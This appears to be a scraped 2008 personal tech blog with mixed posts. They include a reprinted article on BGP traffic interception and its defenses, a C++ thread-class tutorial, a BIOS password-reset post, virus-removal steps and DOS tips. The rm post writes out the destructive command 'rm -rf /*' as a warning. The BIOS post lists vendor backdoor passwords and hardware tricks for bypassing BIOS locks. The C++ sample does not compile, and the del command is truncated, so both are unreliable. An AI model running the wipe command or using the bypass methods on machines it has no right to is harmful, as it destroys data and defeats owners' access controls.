The man-in-the-middle attack exploits BGP to fool routers into re-directing data to an eavesdropper's network.

Anyone with a BGP router (ISPs, large corporations or anyone with space at a carrier hotel) could intercept data headed to a target IP address or group of addresses. The attack intercepts only traffic headed to target addresses, not from them, and it can't always vacuum in traffic within a network -- say, from one AT&T customer to another.

The method conceivably could be used for corporate espionage, nation-state spying or even by intelligence agencies looking to mine internet data without needing the cooperation of ISPs.
BGP eavesdropping has long been a theoretical weakness, but no one is known to have publicly demonstrated it until Anton "Tony" Kapela, data center and network director at 5Nines Data, and Alex Pilosov, CEO of Pilosoft, showed their technique at the recent DefCon hacker conference. The pair successfully intercepted traffic bound for the conference network and redirected it to a system they controlled in New York before routing it back to DefCon in Las Vegas.

The technique, devised by Pilosov, doesn't exploit a bug or flaw in BGP. It simply exploits the natural way BGP works.

"We're not doing anything out of the ordinary," Kapela told Wired.com. "There's no vulnerabilities, no protocol errors, there are no software problems. The problem arises (from) the level of interconnectivity that's needed to maintain this mess, to keep it all working."
The issue exists because BGP's architecture is based on trust. To make it easy, say, for e-mail from Sprint customers in California to reach Telefonica customers in Spain, networks for these companies and others communicate through BGP routers to indicate when they're the quickest, most efficient route for the data to reach its destination. But BGP assumes that when a router says it's the best path, it's telling the truth. That gullibility makes it easy for eavesdroppers to fool routers into sending them traffic.

Here's how it works. When a user types a website name into his browser or clicks "send" to launch an e-mail, a Domain Name System server produces an IP address for the destination. A router belonging to the user's ISP then consults a BGP table for the best route. That table is built from announcements, or "advertisements," issued by ISPs and other networks -- also known as Autonomous Systems, or ASes -- declaring the range of IP addresses, or IP prefixes, to which they'll deliver traffic.

The routing table searches for the destination IP address among those prefixes. If two ASes deliver to the address, the one with the more specific prefix "wins" the traffic. For example, one AS may advertise that it delivers to a group of 90,000 IP addresses, while another delivers to a subset of 24,000 of those addresses. If the destination IP address falls within both announcements, BGP will send data to the narrower, more specific one.

To intercept data, an eavesdropper would advertise a range of IP addresses he wished to target that was narrower than the chunk advertised by other networks. The advertisement would take just minutes to propagate worldwide, before data headed to those addresses would begin arriving to his network.
The attack is called an IP hijack and, on its face, isn't new.

But in the past, known IP hijacks have created outages, which, because they were so obvious, were quickly noticed and fixed. That's what occurred earlier this year when Pakistan Telecom inadvertently hijacked YouTube traffic from around the world. The traffic hit a dead-end in Pakistan, so it was apparent to everyone trying to visit YouTube that something was amiss.

Pilosov's innovation is to forward the intercepted data silently to the actual destination, so that no outage occurs.

Ordinarily, this shouldn't work -- the data would boomerang back to the eavesdropper. But Pilosov and Kapela use a method called AS path prepending that causes a select number of BGP routers to reject their deceptive advertisement. They then use these ASes to forward the stolen data to its rightful recipients.
"Everyone ... has assumed until now that you have to break something for a hijack to be useful," Kapela said. "But what we showed here is that you don't have to break anything. And if nothing breaks, who notices?"
Stephen Kent, chief scientist for information security at BBN Technologies, who has been working on solutions to fix the issue, said he demonstrated a similar BGP interception privately for the Departments of Defense and Homeland Security a few years ago.

Kapela said network engineers might notice an interception if they knew how to read BGP routing tables, but it would take expertise to interpret the data.

A handful of academic groups collect BGP routing information from cooperating ASes to monitor BGP updates that change traffic's path. But without context, it can be difficult to distinguish a legitimate change from a malicious hijacking. There are reasons traffic that ordinarily travels one path could suddenly switch to another -- say, if companies with separate ASes merged, or if a natural disaster put one network out of commission and another AS adopted its traffic. On good days, routing paths can remain fairly static. But "when the internet has a bad hair day," Kent said, "the rate of (BGP path) updates goes up by a factor of 200 to 400."

Kapela said eavesdropping could be thwarted if ISPs aggressively filtered to allow only authorized peers to draw traffic from their routers, and only for specific IP prefixes. But filtering is labor intensive, and if just one ISP declines to participate, it "breaks it for the rest of us," he said.

"Providers can prevent our attack absolutely 100 percent," Kapela said. "They simply don't because it takes work, and to do sufficient filtering to prevent these kinds of attacks on a global scale is cost prohibitive."
Filtering also requires ISPs to disclose the address space for all their customers, which is not information they want to hand competitors.

Filtering isn't the only solution, though. Kent and others are devising processes to authenticate ownership of IP blocks, and validate the advertisements that ASes send to routers so they don't just send traffic to whoever requests it.

Under the scheme, the five regional internet address registries would issue signed certificates to ISPs attesting to their address space and AS numbers. The ASes would then sign an authorization to initiate routes for their address space, which would be stored with the certificates in a repository accessible to all ISPs. If an AS advertised a new route for an IP prefix, it would be easy to verify if it had the right to do so.

The solution would authenticate only the first hop in a route to prevent unintentional hijacks, like Pakistan Telecom's, but wouldn't stop an eavesdropper from hijacking the second or third hop.

For this, Kent and BBN colleagues developed Secure BGP (SBGP), which would require BGP routers to digitally sign with a private key any prefix advertisement they propagated. An ISP would give peer routers certificates authorizing them to route its traffic; each peer on a route would sign a route advertisement and forward it to the next authorized hop. The drawback is that current routers lack the memory and processing power to generate and validate signatures. And router vendors have resisted upgrading them because their clients, ISPs, haven't demanded it, due to the cost and man hours involved in swapping out routers.

"That means that nobody could put themselves into the chain, into the path, unless they had been authorized to do so by the preceding AS router in the path," Kent said.

Douglas Maughan, cybersecurity research program manager for the DHS's Science and Technology Directorate, has helped fund research at BBN and elsewhere to resolve the BGP issue. But he's had little luck convincing ISPs and router vendors to take steps to secure BGP.

"We haven't seen the attacks, and so a lot of times people don't start working on things and trying to fix them until they get attacked," Maughan said. "(But) the YouTube (case) is the perfect example of an attack where somebody could have done much worse than what they did."

ISPs, he said, have been holding their breath, "hoping that people don’t discover (this) and exploit it."
"The only thing that can force them (to fix BGP) is if their customers ... start to demand security solutions," Maughan said.
[via]

RedHat and Fedora Servers compromised

2008-08-22T21:11:00.001+05:30

Its hard to believe. But, yes, RedHat and Fedora servers have been compromised. Paul W. Frields has sent a mail which confirms this.

https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html

Windows BSOD Hits Beijing Opening Ceremony

2008-08-12T19:36:00.000+05:30

Designing a Thread Class in C++

2008-07-28T19:46:00.002+05:30

Introduction

Multi threaded programming is becoming ever more popular. This section presents a design for a C++ class that will encapsulate the threading mechanism. Certain aspects of thread programming, like mutexes and semaphores are not discussed here. Also, operating system calls to manipulate threads are shown in a generic form.

Brief Introduction To Threads

To understand threads one must think of several programs running at once. Imagine further that all these programs have access to the same set of global variables and function calls. Each of these programs would represent a thread of execution and is thus called a thread. The important differentiation is that each thread does not have to wait for any other thread to proceed. All the threads proceed simultaneously. To use a metaphor, they are like runners in a race, no runner waits for another runner. They all proceed at their own rate.

Why use threads you might ask. Well threads can often improve the performance of an application and they do not incur significant overhead to implement. They effectively give good bang for a buck. Imagine an image server program that must service requests for images. The program gets a request for an image from another program. It must then retrieve the image from a database and send it to the program that requested it. If the server were implemented in a single threaded approach, only one program could request at a time. When it was busy retrieving an image and sending it to a requestor, it could not service other requests. Of course one could still implement such a system without using threads. It would be a challenge though. Using threads, one can very naturally design a system to handle multiple requests. A simple approach would be to create a thread for each request received. The main thread would create this thread upon receipt of a request. The thread would then be responsible for the conversation with the client program from that point on. After retrieving the image, the thread would terminate itself. This would provide a smooth system that would continue to service requests even though it was busy servicing other requests at the same time.

Basic Approach

The create a thread, you must specify a function that will become the entry point for the thread. At the operating system level, this is a normal function. We have to do a few tricks to wrap a C++ class around it because the entry function cannot be a normal member function of a class. However, it can be a static member function of a class. This is what we will use as the entry point. There is a gotcha here though. Static member functions do not have access to the this pointer of a C++ object. They can only access static data. Fortunately, there is way to do it. Thread entry point functions take a void * as a parameter so that the caller can typecast any data and pass in to the thread. We will use this to pass this to the static function. The static function will then typecast the void * and use it to call a non static member function.

Implementation

It should be mentioned that we are going to discuss a thread class with limited functionality. It is possible to do more with threads than this class will allow.

class Thread<br /> {<br />    public:<br />       Thread();<br />       int Start(void * arg);<br />    protected:<br />       int Run(void * arg);<br />       static void * EntryPoint(void*);<br />       virtual void Setup();<br />       virtual void Execute(void*);<br />       void * Arg() const {return Arg_;}<br />       void Arg(void* a){Arg_ = a;}<br />    private:<br />       THREADID ThreadId_;<br />       void * Arg_;<br /> <br /> };<br /> <br /> Thread::Thread() {}<br /> <br /> int Thread::Start(void * arg)<br /> {<br />    Arg(arg); // store user data<br />    int code = thread_create(Thread::EntryPoint, this, & ThreadId_);<br />    return code;<br /> }<br /> <br /> int Thread::Run(void * arg)<br /> {<br />    Setup();<br />    Execute( arg );<br /> }<br /> <br /> /*static */<br /> void * Thread::EntryPoint(void * pthis)<br /> {<br />    Thread * pt = (Thread*)pthis;<br />    pthis->Run( Arg() );<br /> }<br /> <br /> virtual void Thread::Setup()<br /> {<br />         // Do any setup here<br /> }<br /> <br /> virtual void Thread::Execute(void* arg)<br /> {<br />         // Your code goes here<br /> }<br />

It is important to understand that we are wrapping a C++ object around a thread. Each object will provide an interface to a single thread. The thread and the object are not the same. The object can exist without a thread. In this implementation, the thread does not actually exist until the Start function is called.
Notice that we store the user argument in the class. This is necessary because we need a place to store it temporarily until the thread is started. The operating system thread call allows us to pass an argument but we have used it to pass the this pointer. So we store the real user argument in the class itself and when the execute function is called it can get access to the argument.

Thread(); - This is the constructor.
int Start(void * arg); - This function provides the means to create the thread and start it going. The argument arg provides a way for user data to be passed into the thread. Start() creates the thread by calling the operating system thread creation function.
int Run(void * arg); - This is a protected function that should never be tampered with.
static void * EntryPoint(void * pthis); - This function serves as the entry point to the thread. It simply casts pthis to Thread * and
virtual void Setup(); - This function is called after the thread has been created but before Execute() is called. If you override this function, remember to call the parent class Execute().
virtual void Execute(void *); - You must override this function to provide your own functionality.

Using The Thread Class

To use the thread class, you derive a new class. you override the Execute() function where you provide your own functionality. You may override the Setup() function to do any start up duties before Execute is called. If you override Setup(), remember to call the parent class Setup().

Conclusion

This section presented an implementation of a thread class written in C++. Of course it is a simple approach but it provides a sound foundation upon which to build a more robust design.

rm -rf

2008-07-28T13:51:00.003+05:30

I see some guys visiting my blog for rm -rf reference. I will write a short note on the usage of rm

Never, ever run this command: rm -rf /*

Combining with find:

[arun@om]$ find . -name "*.T" -exec grep -H "Hello" {} \;
./1.T:Hello
./Name/a.T: Hello Buddy;

To find and delete all the files under the current directory, having extension .T

[arun@om]$ find . -name "*.T" -exec rm {} \;

This is essentially, the power of find to fork rm process.

Keystroke recorders

2008-07-27T20:18:00.001+05:30

These key stroke records has been around the market since 4 or 5 years. Seems like Indian browsing centers have just started using them to tap their client's messages (or whatever).

This could be used in net cafes, exhibitions, hotels and airports. So be careful especially when you use the net cafes to manage your bank details their bank accounts online or any other important sites.

After you enter the bank account and leave the PC it will be easy to
open your account again as all what you have typed has been saved in
the Black device.

Check for this in any netcafe you go, and you can definitely sue them. ;-)

The Ten Commandments for C Programmers

2008-07-27T17:00:00.001+05:30

Thou shalt run lint frequently and study its pronouncements with care, for verily its perception and judgement oft exceed thine.
Thou shalt not follow the NULL pointer, for chaos and madness await thee at its end.
Thou shalt cast all function arguments to the expected type if they are not of that type already, even when thou art convinced that this is unnecessary, lest they take cruel vengeance upon thee when thou least expect it.
If thy header files fail to declare the return types of thy library functions, thou shalt declare them thyself with the most meticulous care, lest grievous harm befall thy program.
Thou shalt check the array bounds of all strings (indeed, all arrays), for surely where thou typest ``foo'' someone someday shall type ``supercalifragilisticexpialidocious''.
If a function be advertised to return an error code in the event of difficulties, thou shalt check for that code, yea, even though the checks triple the size of thy code and produce aches in thy typing fingers, for if thou thinkest ``it cannot happen to me'', the gods shall surely punish thee for thy arrogance.
Thou shalt study thy libraries and strive not to re-invent them without cause, that thy code may be short and readable and thy days pleasant and productive.
Thou shalt make thy program's purpose and structure clear to thy fellow man by using the One True Brace Style, even if thou likest it not, for thy creativity is better used in solving problems than in creating beautiful new impediments to understanding.
Thy external identifiers shall be unique in the first six characters, though this harsh discipline be irksome and the years of its necessity stretch before thee seemingly without end, lest thou tear thy hair out and go mad on that fateful day when thou desirest to make thy program run on an old system.
Thou shalt foreswear, renounce, and abjure the vile heresy which claimeth that ``All the world's a VAX'', and have no commerce with the benighted heathens who cling to this barbarous belief, that the days of thy program may be long even though the days of thy current machine be short.

[via]

Story behind the Tux

2008-07-11T22:33:00.000+05:30

Transparent Desktop Cube - Compiz Fusion

2008-07-05T00:56:00.000+05:30

Sometime back I made this post to show how my sister's desktop looks with Compiz Fusion on Ubuntu - Gutsy Gibbon.

And, now this is how my desktop looks with transparent cube. Unlike Gutsy Gibbon, Hardy Heron is more aesthetic in use. Also, the video drivers doesn't hook up the CPU. I believe that this is the best version of Linux I have used so far (from Desktop perspective).

Removing virus manually on XP

2008-06-12T09:34:00.000+05:30

Read this tutorial if u want to remove a virus not detected by antivirus software or if u want to be an amateur malware researcher. The tutorial may not be that good, i hadn't much time to go in more details.

Begin:

Start->Run->type cmd

In each drive type attrib /s /d it will display the list of all files in that drive along with folders. concentrate on files having SHR attribute. Normally virus files have two characteristics

1.SHR attribute
2.Queer name like amvo.exe,r6r.exe,autorun.inf etc.

Note: Some system files also have this attribute like MSDOS.SYS, IO.SYS etc. So before you delete googling about that file will help.

To delete these files type c:\>del /f /s /a >>

+ To view the content of files with .inf, .vbs, .c etc. i.e files which are not batch files or executables. go to explorer and then go to the required drive or folder and type the filename with extension. It will open up in notepad.

+ There is another method. Go to the required location and type attrib -s -h -r filename then use gui to see that hidden file. if it is not an exe or .bat then just open it with notepad. Here you will get some information like a file name or a registry key which the virus affects or a startup item or process. Change this or uncheck the startup.

+ If the file is not deleted like it says "access denied" it means it already used by some process. open task manager and find a process of the same name or some process which is not a valid windows process(better google) and end that process.

+ If it's not found then open msconfig go to startup tab and look at it. If a startup items seems queer (u wil have this feeling if you're not experienced windows user otherwise all data startup items may seem queer.) uncheck that. You may also learn about the startup item by googling. after unchecking restart the computer.

This method is effective in removing some spywares or some small but annoying very like maskrider etc. which are sometimes not detected by antivirus softwares.

Firefox tweaks

2008-05-01T16:41:00.002+05:30

In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox. These are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections. So if you are not on broadband, you may not be satisfied with this.

OK now Double Click on the following settings and put in the numbers below - for the true / false Boolean - they’ll change when you double click.

browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300

One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re on broadband - it shouldn’t have to wait.

Now you will notice your FireFox MUCH faster than before.

Keyboard shortcuts for DOS

2008-03-20T09:54:00.002+05:30

We look at some useful keyboard shortcuts and commands that will help you personalize the MS-DOS Command Prompt Window without using the mouse.

You will also learn about hotkeys for executing DOS commands more quickly. The keyboard shortcuts are known to work in Windows Vista and XP command prompt.

1. Change the color scheme of the DOS Window

color bf - where b is the background color while f is for the foreground color (they are hex codes).

For instance, if you want to have a white background with black text, type color F0 and press enter. To revert to the original color scheme, type color without any arguments.

For a list of all available colors, type color /? on the command line.

2. Change the Title of the Window to reflect the current time

Do you know that you can put your name or your blog address in the title of the command prompt window. That’s like a neat watermark when you are using that screenshot for your website.

title your_name %time%

That %time% will append the current timestamp to the Window’s title.

3. Navigate the Command History using Keyboard

If you have a long list of commands in the history, press the function key F7 to navigate through the history list using the arrow keys.

And if you already know the command number, press F9 and directly type that number. Very useful if you have to run some command repeatedly.

4. Typing Long Commands at the DOS Prompt

You know the frustration when you type some long command only to realize that you made a typo or omitted typing some character. Either type the whole command again or a better option is the F1 key.

F1 prints characters of the previous command one by one.

Alternatively, you can press F2 to copy a certain number of characters from the previous command to the current one. Let me illustrate that with an example:

Say I want to run the command “nslookup www.google.com” but wrote “nslookup www.googlx.com” in a hurry.

Instead of retyping the whole thing, I can say F2 and then say x. This will print all the characters upto “x”. Then you can press F3 to complete the command or type it manually.

DOS commands

2008-03-20T09:38:00.003+05:30

Here is the list of commands that you can use with your DOS prompt.

http://technet.microsoft.com/en-us/library/bb491071.aspx

A short note on few of them:

Typing DOS commands on the Windows Command Line prompt is a most efficient and faster way of doing things in Windows XP. Here's a run-down of the most useful DOS commands available in Windows XP. Some of these DOS commands even do not have an visual alternative.

DOS Command-line tools must be run at the prompt of the Cmd.exe command interpreter. To open Command Prompt, click Start, click Run, type cmd, and then click OK.

ipconfig - Windows IP configuration
Useful for troubleshooting your internet connection. Displays the current IP address of your computer and the DNS server address. If you call your ISP for reporting a bad internet connection, he will probably ask you to run ipconfig.

fc - Free BeyondCompare in XP
FC is an advanced DOS Command that compares two files and displays the differences between them. Though the file comparison results are not as interactive as BeyondCompare or Altova DiffDog, fc is still very useful. You can even set fc to resynchronize the files after finding a mismatch.

type - open text files sans Notepad
Similar to Unix cat command, Type is my favorite DOS command for displaying the contents of a text files without modifying them. When used in combination with more switch, type splits the contents of lengthy text files into multiple pages. Avoid using the type command with binary files or you'll hear alien PC beeps and see some greek characters on your PC.

ping - Say hello to another computer
Ping network command followed by the web-address or IP address tells you about the health of the connection and whether the other party is responding to your handshake request. Ping tool can also be used to convert the web address to a physical IP address.

tree - visual directory structure
You often need to take prints of your physical directory structure but XP has no simple "visual" commands for printing directory contents. Here, try the Tree DOS command and redirect the output to a text file.

tree > mydirectory.txt
print mydirectory.txt

attrib - make hidden files visible
Attrib lets you change attributes of System files and even hidden files. This is great for troubleshooting Windows XP. Say your XP doesn't boot ever since you edited that startup boot.ini file (Hidden), use attrib to remove the Hidden attibute and edit the file using EDIT dos command.

assoc - which program will open that .xyz file
The assoc DOS command can be used to either isplay or even modify the file name extension associations. The command assoc .htm will quickly tell you the name of your default web browser (see picture)

move - more flexible than copy-paste
Say you got a lot of XLS and DOC files in you MyDocuments folder and want to move only those XLS files that have their name ending with 2006. In XP Explorer, you have to manually select each file and then cut-paste to another folder. However, the DOS move command make things much simpler. Just type the following at the command prompt:
move *2006.xls c:\2006Reports\

find - advanced file search with filter
Find is the most powerful DOS command and even more useful than the Windows Desktop Search tool or the Windows Find Wizard. The find command searches for a specific string of text in a file or files. After searching the specified file or files, find displays any lines of text that contain the specified string.

To search your hard disk to find and display the file names on drive C: that contain the string "Google" use the pipe (|) to direct the results of a dir command to find as follows:
dir c:\ /s /b | find "Google"

Quick tip - Drag to avoid typing: When your command acts on a file or folder, you must type the path to that folder after the command. You can save typing time by dragging the file or folder from Windows Explorer into the command window.

To view help at the command-line, at the command prompt, type the following:
CommandName /?

TeamViewer

2008-03-16T10:18:00.002+05:30

I downloaded TeamViewer after googling on remote control softwares. I needed to help my mom from here on her difficulties in accessing certain applications and features. So this was the best solution I ever found. It is pretty simple and straight forward.

When you install it, it will ask you for a password. Give some password and remember it. At home, ask your mom to install it and to remember the password that she enters there.
Assume:

The password that you provide during your installation is: mycomp123
The password that your mom provides during the installation at home is: homepc123

After installation, it will give you a number (your identification) that the remote computer will use to connect to your computer. Note this down for yourself and, ask your mom for her TeamViewer ID and password (homepc123).

TeamViewer should be running on your mom's pc for you to connect to that.

Once you connect, it will ask you for the authentication password. Enter homepc123 and that is it! You are now connected, and can take the complete control of the home pc. :-)

There are several other options, including, VPN, File transfer. Try that for yourself.

Resetting BIOS Passwords

2008-03-11T23:32:00.003+05:30

The best method to reset a BIOS password depends on what BIOS the computer has. Common BIOS's include AMI, Award, IBM and Phoenix. Numerous other BIOS's do exist, but these are the most common.

Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed.

The general categories of solutions to reset a BIOS password are:

Using a Backdoor BIOS Password
Resetting the BIOS Password using Software
Resetting the BIOS Password using Hardware
Vendor Specific Solutions for resetting the BIOS Password

Using a Backdoor BIOS Password

Some BIOS manufacturers implement a backdoor password. The backdoor password is a BIOS password that works, no matter what the user sets the BIOS password to. These passwords are typically used for testing and maintenance. Manufacturers typically change the backdoor BIOS passwords from time to time.

AMI Backdoor BIOS Passwords:

Reported AMI backdoor BIOS passwords include A.M.I., AAAMMMIII, AMI?SW , AMI_SW, BIOS, CONDO, HEWITT RAND, LKWPETER, MI, and PASSWORD.

Award Backdoor BIOS Passwords:

One reported Award backdoor BIOS password is eight spaces. Other reported Award backdoor BIOS passwords include 01322222, 589589, 589721, 595595, 598598 , ALFAROME, ALLY, ALLy, aLLY, aLLy, aPAf, award, AWARD PW, AWARD SW, AWARD?SW, AWARD_PW, AWARD_SW, AWKWARD, awkward, BIOSTAR, CONCAT, CONDO, Condo, condo, d8on, djonet, HLT, J256, J262, j262, j322, j332, J64, KDD, LKWPETER, Lkwpeter, PINT, pint, SER, SKY_FOX, SYXZ, syxz, TTPTHA, ZAAAADA, ZAAADA, ZBAAACA, and ZJAAADC.

Phoenix Backdoor BIOS Passwords:

Reported Phoenix BIOS backdoor passwords include BIOS, CMOS, phoenix, and PHOENIX.

Backdoor BIOS Passwords from Other Manufacturers:

Reported BIOS backdoor passwords for other manufacturers include:

Manufacturer	BIOS Password
VOBIS & IBM	merlin
Dell	Dell
Biostar	Biostar
Compaq	Compaq
Enox	xo11nE
Epox	central
Freetech	Posterie
IWill	iwill
Jetway	spooml
Packard Bell	bell9
QDI	QDI
Siemens	SKY_FOX
SOYO	SY_MB
TMC	BIGO
Toshiba	Toshiba

Remember that what you see listed may not be the actual backdoor BIOS password, this BIOS password may simply have the same checksum as the real backdoor BIOS password. For Award BIOS, this checksum is stored at F000:EC60.

Resetting the BIOS Password using Software

Every system must store the BIOS password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the BIOS password. You must know the memory address where the BIOS password is stored, and the format in which the BIOS password is stored. Or, you must have a program that knows these things.

You can write your own program to read the BIOS password from the CMOS memory on a PC by writing the address of the byte of CMOS memory that you wish to read in port 0x370, and then reading the contents of port 0x371.

!BIOS will recover the BIOS password for most common BIOS versions, including IBM, American Megatrends Inc, Award and Phoenix.

CmosPwd will recover the BIOS password for the following BIOS versions:

ACER/IBM BIOS
AMI BIOS
AMI WinBIOS 2.5
Award 4.5x/4.6x/6.0
Compaq (1992)
Compaq (New version)
IBM (PS/2, Activa, Thinkpad)
Packard Bell
Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107
Phoenix 4 release 6 (User)
Gateway Solo - Phoenix 4.0 release 6
Toshiba
Zenith AMI

Resetting the BIOS Password using Hardware

If you cannot access the machine after if has been powered up, it is still possible to get past the BIOS password. The BIOS password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information (including the BIOS password) will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.

On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery. If you cannot locate this jumper, you might short both of the points where the battery connects to the motherboard.

If all else fails, you may have to clear the BIOS password by resetting the RTC (Real Time Clock) IC (Integrated Circuit) on your motherboard.

Many RTC's require an external battery. If your RTC is one of this type, you can clear the BIOS password just by unsocketing the RTC and reseating it.

RTC's which require external batteries include:

Dallas Semiconductor DS12885S
TI benchmarq bq3258S
Motorola MC146818AP
Hitachi HD146818AP
Samsung KS82C6818A

Most RTC chips with integrated batteries can be reset to clear the BIOS password by shorting two pins together for a few seconds.

You will see more than one option for some chips due to testing by various people in the field. Remember to remove power from the system before shorting these pins.

RTC Chip	Pins
Dallas DS1287A TI benchmarq bp3287AMT	3 (N.C.) and 21 (NC/RCL)
Chips & Technologies P82C206	12 (GND) and 32 (5V) -or- 74 (GND) and 75 (5V)
OPTi F82C206	3 and 26
Dallas Semiconductor DS12887A	3 (N.C.) and 21 (RCLR)

You should be able to discover how to reset the BIOS password stored in most RTC (Real Time Clock) chips by reading the manufacturers data sheet for that RTC. Some RTC's, like the Dallas DS1287 and TI benchmarq bq3287mt cannot be cleared. The solution to resetting the BIOS password on systems with those RTC's is to purchase a replacement RTC chip. How inconvenient!

Viruses, Worms and Trojans

2008-02-29T10:07:00.001+05:30

Unix. The world’s first computer virus.Title of Chapter 1 of The Unix Haters Handbook, ISBN: 1-56884-203-1

The above is indeed the title of a chapter! The book is in fact written by serious computer scientists. Nevertheless, we must disregard the suggestion that Unix is a virus as an attempt at being hilarious. Equally unhelpful are the news media that use the term virus in referring to any piece of malicious software. The academic world uses the term “malware” for these. Rigorous definitions have been given by many computer security experts but they do not match the typical use even by other security experts. Thus, we must settle for practical “definitions” of malicious software.

Definitions

Security tools are designed to be used to protect computer systems and networks. These can also be used by unauthorized individuals to probe for weaknesses. Many of the programs that fall in the malware categories below have benevolent uses. For example, worms can be used to distribute computation on idle processors; back doors are useful for debugging programs; and viruses can be written to update source code and patch bugs. The purpose, not the approach, makes a program malicious.

Back doors, sometimes called trap doors, allow unauthorized access to your system.

Logic bombs are programmed threats that lie dormant for an extended period of time until they are triggered; at this point, they perform a function that is not the intended function of the program in which they are contained. Logic bombs usually are embedded in programs by software developers who have legitimate access to the system.

Viruses are “programs” that modify other programs on a computer, inserting copies of themselves. A program is a file that adheres to a strict description of how its content is organized. On Linux systems, the ELF document of some 50-pages describes this format. In this sense, viruses are not programs - they cannot run on their own, and need to become part of some host program. When such an infected program is executed, the virus attaches itself to another and so on.

A worm is a malicious program that copies itself from one computer to another on a network. A worm is an independent program, in the sense described above, unlike a virus which is a part-program that must insert itself into a whole-program. A worm typically does not modify other programs. A typical worm may carry other code, including programs and viruses.

Trojan horses are programs that appear to have one function but actually perform another function. Trojan horses are named after the Trojan horse of the Greek Trojan War.

Bacteria, or rabbit programs, make copies of themselves to overwhelm a computer system’s resources. Bacteria do not explicitly damage any files. Their sole purpose is to replicate themselves. A typical bacteria program may do nothing more than execute two copies of itself simultaneously on multiprogramming systems, or perhaps create two new files, each of which is a copy of the original source file of the bacteria program. Both of those programs then may copy themselves twice, and so on. Bacteria reproduce exponentially, eventually taking up all the processor capacity, memory, or disk space, denying the user access to those resources.

A dropper is a program that is not a virus, nor is it infected with a virus, but when run it installs a virus into memory, on to the disk, or into a file. Droppers have been written sometimes as a convenient carrier for a virus, and sometimes as an act of sabotage. Some anti-virus programs try to detect droppers.

[From http://securityresponse.symantec.com/avcenter/refa.html ] “Blended threats combine the characteristics of viruses, worms, Trojan Horses, and malicious code with server and Internet vulnerabilities to initiate, transmit, and spread an attack. By using multiple methods and techniques, blended threats can rapidly spread and cause widespread damage. Characteristics of blended threats include:

Causes harm: Launches a Denial of Service (DoS) attack at a target IP address, defaces Web servers, or plants Trojan Horse programs for later execution.
Propagates by multiple methods: Scans for vulnerabilities to compromise a system, such as embedding code in HTML files on a server, infecting visitors to a compromised Web site, or sending unauthorized email from compromised servers with a worm attachment.
Attacks from multiple points: Injects malicious code into the .exe files on a system, raises the privilege level of the guest account, creates world read and writeable network shares, makes numerous registry changes, and adds script code into HTML files.
Spreads without human intervention: Continuously scans the Internet for vulnerable servers to attack.
Exploits vulnerabilities: Takes advantage of known vulnerabilities, such as buffer overflows, HTTP input validation vulnerabilities, and known default passwords to gain unauthorized administrative access. Effective protection from blended threats requires a comprehensive security solution that contains multiple layers of defense and response mechanisms.”

Virus Varieties

Stealth Virus
A stealth virus has code in it that seeks to conceal itself from discovery or defends itself against attempts to analyze or remove it. The stealth virus adds itself to a file or boot sector but, when you examine, it appears normal and unchanged. The stealth virus performs this trickery by staying in memory after it is executed. From there, it monitors and intercepts your system calls. When the system seeks to open an infected file, the stealth virus displays the uninfected version, thus hiding itself.

Macro Viruses
Macro languages are (often) equal in power to ordinary programming languages such as C. A program written in a macro language is interpreted by the application. Macro languages are conceptually no different from so-called scripting languages. Gnu Emacs uses Lisp, most Microsoft applications use Visual Basic Script as macro languages. The typical use of a macro in applications, such as MS Word, is to extend the features of the application. Some of these macros, known as auto-execute macros, are executed in response to some event, such as opening a file, closing a file, starting an application, and even pressing a certain key. A macro virus is a piece of self-replicating code inserted into an auto-execute macro. Once a macro is running, it copies itself to other documents, delete files, etc. Another type of hazardous macro is one named for an existing command of the application. For example, if a macro named FileSave exists in the “normal.dot” template of MS Word, that macro is executed whenever you choose the Save command on the File menu. Unfortunately, there is often no way to disable such features.
In May 2000, an OutLook mail program macro virus called LOVELETTER propagated widely.

Unix/Linux Viruses
The most famous of the security incidents in the last decade was the Internet Worm incident which began from a Unix system. But Unix systems were considered virus-immune — not so. Several Linux viruses have been discovered. The Staog virus first appeared in 1996 and was written in assembly language by the VLAD virus writing group, the same group responsible for creating the first Windows 95 virus called Boza.

Like the Boza virus, the Staog virus is a proof-of-concept virus to demonstrate the potential of Linux virus writing without actually causing any real damage. Still, with the Staog assembly language source code floating around the Internet, other virus writers are likely to study and modify the code to create new strains of Linux viruses in the future.

The second known Linux virus is called the Bliss virus. Unlike the Staog virus, the Bliss virus can not only spread in the wild, but also possesses a potentially dangerous payload that could wipe out data.

While neither virus is a serious threat to Linux systems, Linux and other Unix systems will not remain virus-free. Fortunately, Linux virus writing is more difficult than macro virus writing for Windows, so the greatest virus threat still remains with Windows. [July 2000, http://www.boardwatch .com/ mag/ 2000/ jul/ bwm142pg2.html ]

Spreading Malware via the Internet

Whereas a Trojan horse is delivered pre-built, a virus infects. In the past, such malicious programs arrived via tapes and disks, and the spread of a virus around the world took many months. Antivirus companies had time to identify a new viral strain, and create cleaning procedures. Today, Trojan horses, and viruses are network deliverable as E-mail, Java applets, ActiveX controls, JavaScripted pages, CGI-BIN scripts, or as self-extracting packages.

